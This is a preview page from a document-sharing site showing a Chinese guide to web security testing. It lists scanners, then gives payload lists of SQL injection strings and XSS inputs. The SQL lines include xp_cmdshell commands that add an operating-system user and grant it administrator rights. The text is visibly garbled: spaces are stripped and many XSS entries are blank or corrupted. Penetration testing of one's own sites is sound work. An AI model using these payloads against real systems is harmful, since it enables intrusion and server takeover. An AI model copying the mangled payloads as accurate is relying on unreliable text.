web安全测试方法

web安全测试方法

ID:32367216

大小:37.00 KB

页数:3页

时间:2019-02-03

web安全测试方法_第1页
web安全测试方法_第2页
web安全测试方法_第3页
资源描述:

《web安全测试方法》由会员上传分享,免费在线阅读,更多相关内容在应用文档-天天文库

1、工具扫描目前web安全扫描器针对XSS、SQLinjection、OPENredirect、PHPFileInclude漏洞的检测技术已经比较成熟。商业软件web安全扫描器:有IBMRationalAppscan、WebInspect、AcunetixWVS免费的扫描器:W3af、Skipfish等根据业务资金,可以考虑购买商业扫描软件,也可以使用免费的,各有各的好处。首页可以对网站进行大规模的扫描操作,工具扫描确认没有漏洞或者漏洞已经修复后,再进行以下手工检测。手工检测对于CSRF、越权访问、文件上传、修改密码等漏洞,难以实现自动化

2、检测的效果,这是因为这些漏洞涉及系统逻辑或业务逻辑,有时候还需要人机交互参与页面流程,因此这类漏洞的检测更多的需要依靠手动测试完成。手工检测网站URL、后台登陆是否具有SQL注入Admin--‘or--‘and()execinsert*%chrmidand1=1;And1=1;aNd1=1;char(97)char(110)char(100)char(49)char(61)char(49);%20AND%201=2‘and1=1;‘And1=1;‘aNd1=1;and1=2;‘and1=2and2=2anduser>0and(sele

3、ctcount(*)fromsysobjects)>0and(selectcount(*)frommsysobjects)>0and(SelectCount(*)fromAdmin)>=0and(selecttop1len(username)fromAdmin)>0(username已知字段);execmaster..xp_cmdshell“netusernamepassword/add”—;execmaster..xp_cmdshell“netlocalgroupnameadministrators/add”—and0<>(sele

4、ctcount(*)fromadmin)XSS:对于get请求的URL一般漏洞扫描软件都可扫描到是否存在XSS漏洞。(但是软件没有完美的,也有误报,或者有遗漏的情况)对于POST的请求的(例如留言板,评论,等等),就是要在输入框输入的情况,则要进行以下测试 ★~!@#$%^&*()_+<>,./?;'"[]{}- ★%3Cinput/%3E ★%3Cscript%3Ealert('XSS')%3C/script%3E ★ ★ ★alert('xs

5、s') ★ ★ ★javascript.:alert(/xss/) ★javascript.:alert(/xss/) ★ ★ ★ ★=

6、’> ★1.jpg"nmouseover="alert('xss') ★"> ★http://xxx';alert('xss');var/a='a ★’”>xss&< ★"onmouseover=alert('hello');" ★&{alert('hello');}★>"'>★>%22%27>

7、script.:alert(%27XSS%27)%22> ★>"'>★AK%22%20style%3D%22background:url(javascript.:alert(%27XSS%27))%22%20OS%22★%22%2Baler

8、t(%27XSS%27)%2B%22★

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。